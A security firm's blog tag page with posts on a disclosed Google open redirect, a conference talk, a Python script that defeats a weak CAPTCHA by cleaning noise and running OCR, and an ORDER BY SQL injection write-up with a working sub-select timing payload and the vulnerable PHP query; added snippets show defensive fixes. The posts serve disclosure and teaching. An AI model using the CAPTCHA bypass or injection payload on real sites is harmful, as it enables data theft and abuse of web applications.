Posts Tagged ‘Web Application Security’

Google Open Redirection Vulnerability

October 5th, 2010

A month ago we found an Open Redirection vulnerability in Google. The vulnerability has already been fixed by the vendor, and we were thinking about how we could add value to its disclosure. After some thought, we decided that showing how we found the vulnerability was more interesting than the vulnerability itself, so… here we go:

After identifying Twitter’s Open Redirection Vulnerability, we thought it would be cool to find one at Google. Given that “” is huge, we used Google’s search engine and some dorks to narrow down our tests. Interestingly enough, that worked perfectly and we were able to identify vulnerabilities within the first 10 minutes of testing! The following screenshot (just click on the image to enlarge it) illustrates this step:

Google Dork used to find the vulnerability

In this link we found that by browsing:

The affected user was redirected to without any warning, allowing possible phishing attacks. The following screenshots show the complete HTTP traffic:

Burp HTTP Traffic Capture I

And the answer from the server with a new location:

Burp HTTP Traffic Capture II

Digging deeper with Dirbuster, we discovered that other instances/directories were also affected:

New vectors for exploiting this kind of vulnerability are being discussed in Web security forums. Depending on the browser, it might be possible to execute JavaScript code in the victim’s browser, which changes the real risk associated with this type of vulnerability.
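As an added example (not part of the original post), here is the kind of server-side check that prevents this class of bug: a Python redirect-target validator that only lets through same-site paths or http(s) URLs to an allowlisted host. The host names are constructed for the example.

```python
from urllib.parse import urlsplit, urlunsplit

# Constructed allowlist: the only hosts this application may redirect to.
ALLOWED_HOSTS = {"www.example.com", "accounts.example.com"}


def safe_redirect_target(target, default="/"):
    """Return `target` when it is a same-site path or an http(s) URL to an
    allowlisted host; otherwise return `default`. Building the Location
    header only from this value keeps users from being sent off-site."""
    if not target or "\r" in target or "\n" in target:
        return default                 # empty, or would split the header
    target = target.strip()
    parts = urlsplit(target)
    if parts.scheme:
        # Absolute URL: only http/https to an allowlisted host is acceptable;
        # this also drops javascript: and other non-web schemes.
        if parts.scheme not in ("http", "https") or parts.hostname not in ALLOWED_HOSTS:
            return default
        return urlunsplit(("https", parts.hostname, parts.path or "/", parts.query, ""))
    if parts.netloc:
        return default                 # scheme-relative "//host/..." leaves the site
    # Relative path: exactly one leading slash. Browsers read "//" or "/\" at the
    # start as an authority, so those would be off-site redirects too.
    if not target.startswith("/") or target[1:2] in ("/", "\\"):
        return default
    return urlunsplit(("", "", parts.path, parts.query, ""))
```

Anything the validator rejects falls back to the application's own default page, so the redirect parameter can no longer be used to send a user to an arbitrary site.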

Posted by nahuel in bonsai, security

Ekoparty 2010 “Hackers go corporate”: Breakfast with CIOs, CEOs and CTOs

October 4th, 2010

A new event was organized as part of the sixth edition of the Ekoparty Security Conference: “Hackers Go Corporate”, and as usual our team was there to establish new relationships and strengthen the ones we already have with our current customers.

At the event, CIOs, CEOs and CTOs from the most important Argentinean companies shared a cup of coffee with some of the best information security experts from around the world. The event’s objective was to close the gap between managers and the matters that hackers talk about at the Ekoparty Security Conference.

Andrés Riancho, Bonsai’s CEO, delivered a speech called “Less buffer overflows, more SQL injections” in which he urged the audience to change the way their Web applications are developed. “Nowadays, hackers choose to attack Web applications over daemons like Apache or IIS; and the reason is very simple: Web applications of today are still developed with the same security features as in the 90’s,” Andrés said.

To make Web applications more secure, companies need to change their obsolete development methodologies and integrate security into the software development life cycle. But how do we start? What’s the first step? According to Andrés, the road to secure code starts with performing code reviews and Web application penetration tests, training developers and QA employees in the OWASP Top 10, and inviting security experts to the design meetings.

Posted by andres.riancho in bonsai, security

Breaking Weak CAPTCHA in 26 Lines of Code

February 23rd, 2010

During one of our latest engagements we found a weak CAPTCHA implementation being used in the target Web application. The assessment was being performed on-site, and after identifying this vulnerability we started to talk with the CSO about how easy it would be to break it.
The general consensus, of course, was “very easy”. The problem was that we were unable to find any good CAPTCHA-breaking software that the average Joe could download and run on his computer, so I spent a few minutes creating a simple Python script that returns the CAPTCHA solution for this particular implementation.

Before we dig into the script, let’s analyze why this CAPTCHA is weak (it might not be obvious to some readers):

  1. The letters are not rotated
  2. All letters have the same height
  3. All letters have the exact same color
  4. The letters are not deformed in any way
  5. The background noise color is the same for the whole image

Now, let’s see the code that breaks this CAPTCHA:

from PIL import Image
from pytesser import image_to_string

img = Image.open('input.gif')
img = img.convert("RGBA")

pixdata = img.load()

# Clean the background noise: any pixel that is not pure black becomes white.
# This works because every letter has the same color and the noise another.
for y in range(img.size[1]):
    for x in range(img.size[0]):
        if pixdata[x, y] != (0, 0, 0, 255):
            pixdata[x, y] = (255, 255, 255, 255)
img.save("input-black.gif", "GIF")

# Make the image bigger (needed for OCR)
im_orig = Image.open('input-black.gif')
big = im_orig.resize((116, 56), Image.NEAREST)

ext = ".tif"
big.save("input-NEAREST" + ext)

# Perform OCR using the pytesser library
image = Image.open('input-NEAREST.tif')
print(image_to_string(image))

This simple script works with ~90% of the CAPTCHA images created using this specific implementation. Enjoy!

Posted by andres.riancho in bonsai, security

Not the average SQL Injection

July 19th, 2009

SQL injections are among the most common and most critical Web application vulnerabilities that can be identified during a Web Application Penetration Test. SQL injections can occur in any part of a SQL query, but they usually occur in the “where_definition” section. To clarify what I’m talking about, here’s the syntax definition of the SELECT statement for MySQL:

select_expr, ...
[INTO OUTFILE 'file_name' export_options
| INTO DUMPFILE 'file_name']
[FROM table_references
[WHERE where_definition]
[GROUP BY {col_name | expr | position}
[HAVING where_definition]
[ORDER BY {col_name | expr | position}
[ASC | DESC] , ...]
[LIMIT {[offset,] row_count | row_count OFFSET offset}]
[PROCEDURE procedure_name(argument_list)]

While performing some vulnerability research on e-commerce Web applications, Ryan Dewhurst ([email protected]) found a rather uncommon SQL injection vector in the “col_name” section of the SELECT query. At first it looks like the average SQL injection, but when we actually tried to exploit it we discovered that it was more difficult than expected. This is the code snippet for the vulnerability, where we only control the $sort_order value:

$userlog = db_get_array("SELECT change_id, action, timestamp,
                         amount, reason FROM points_table
                         WHERE user_id = ?i ORDER BY $sort_by
                         $sort_order $limit", $user_id);

First of all, no SQL injection tool works with this type of SQL injection. The reason is that they all assume they are going to be injecting into the where_definition part of the query, and in this case that assumption is false. So we went back to the SELECT syntax, and we found that we did not have much room to play with:

[ORDER BY {col_name | expr | position}
[ASC | DESC] , ...]
[LIMIT {[offset,] row_count | row_count OFFSET offset}]
[PROCEDURE procedure_name(argument_list)]

The first idea was to use a UNION clause in order to join two different queries, the one controlled by the web application and the other controlled by us; this seemed like a good idea, but it turned out to be a flawed one:

  • select 1,2,3 union select 4,5,6 Works perfectly.
  • select 1,2,3 order by 1 ASC union select 4,5,6 Throws an "Incorrect usage of UNION and ORDER BY" error.
  • (select 1,2,3 order by 1 ASC) union (select 4,5,6) Works perfectly, but we can't add the "(" at the beginning of the query.

UNION was out of the picture.

Without even noticing that I was testing something syntactically incorrect, I tried to write a file to disk using “INTO OUTFILE”, and surprisingly enough, it worked. The problem is that we can’t control the contents of the file, because in this particular Web application we had no control over the contents of the points_table, so once again we were back where we started: we can’t write a PHP shell to disk.

So the next step was to find a way to execute a SELECT statement after an ORDER BY. The best option we found was to inject a sub-SELECT statement in the col_name section of the ORDER BY. In the end, the SQL injection looked like this:

,(SELECT BENCHMARK(1000000,MD5(1)) FROM points_table where
CURRENT_USER() like '[email protected]' limit 1)

Which makes,

SELECT change_id, action, timestamp, amount, reason FROM
       points_table WHERE user_id = i ORDER BY timestamp,
       (SELECT BENCHMARK(1000000,MD5(1)) FROM points_table
        where CURRENT_USER() like '[email protected]' limit 1)

The only catch is that this injection works only if the outer SELECT statement actually has more than one row to order (a MySQL performance optimization: with a single row there is nothing to sort). So, to be able to exploit this particular SQL injection, we had to buy two items from the e-commerce store in order to add a couple of rows to the points_table, which would then trigger the sub-select in the ORDER BY section of the query.

The above injection can be modified to perform almost any query against the database, which leads to total compromise of the e-commerce web application.
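To make the defensive side concrete, here is an added example (not from the original post or the affected application) in Python with SQLite: the page’s pattern of pasting $sort_by/$sort_order into the ORDER BY clause, beside the allowlist check that fixes it. Identifiers cannot be bound as query parameters, so validation against a fixed set is the sound fix; the column names, table and sample rows are constructed for the example.

```python
import sqlite3

# Constructed allowlists: the only identifiers the application should ever
# paste into its ORDER BY clause (identifiers cannot be bound as parameters).
ALLOWED_SORT_COLUMNS = {"change_id", "action", "timestamp", "amount", "reason"}
ALLOWED_SORT_ORDERS = {"ASC", "DESC"}

BASE_QUERY = ("SELECT change_id, action, timestamp, amount, reason "
              "FROM points_table WHERE user_id = ? ORDER BY ")


def build_query_vulnerable(sort_by, sort_order):
    """Same shape as the page's PHP: the sort values are pasted into the SQL,
    so anything after the column name becomes part of the ORDER BY clause."""
    return BASE_QUERY + f"{sort_by} {sort_order}"


def build_query_safe(sort_by, sort_order):
    """Hardened form: refuse any sort column or direction not on the allowlist."""
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unexpected sort column: {sort_by!r}")
    order = sort_order.strip().upper()
    if order not in ALLOWED_SORT_ORDERS:
        raise ValueError(f"unexpected sort order: {sort_order!r}")
    return BASE_QUERY + f"{sort_by} {order}"


def is_accepted(sort_by, sort_order):
    """True when the hardened builder lets this pair through."""
    try:
        build_query_safe(sort_by, sort_order)
        return True
    except ValueError:
        return False


def run_points_query(query, user_id):
    """Run a built query against an in-memory table with constructed rows and
    return the change_ids in result order (user 7 has two rows to sort)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE points_table (change_id INTEGER, action TEXT, "
                 "timestamp INTEGER, amount INTEGER, reason TEXT, user_id INTEGER)")
    conn.executemany("INSERT INTO points_table VALUES (?, ?, ?, ?, ?, ?)", [
        (1, "buy", 100, 10, "item A", 7),
        (2, "buy", 200, 20, "item B", 7),
        (3, "buy", 300, 5, "item C", 8),
    ])
    try:
        return [row[0] for row in conn.execute(query, (user_id,))]
    finally:
        conn.close()
```

With the vulnerable builder, a sort_order such as "ASC, (SELECT ...)" is executed as an extra ORDER BY expression exactly as the post describes; the hardened builder raises before any SQL is sent.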

The conclusion is simple: while automated tools can help us in many cases, an experienced security professional can never be replaced.

Posted by andres.riancho in security

Web Application Security Training in Buenos Aires

June 5th, 2009

Bonsai’s information security trainings are usually delivered in-company, but after receiving numerous requests we organized our first open training, which employees from different organizations can attend.

The training course will be delivered in four classes of three and a half hours each, from 18:30 to 22:00 on Tuesdays, starting on July 14th, and will be taught by Andrés Riancho.

More information about the Web Application Security Training in Buenos Aires can be found here.

Posted by andres.riancho in bonsai, security, w3af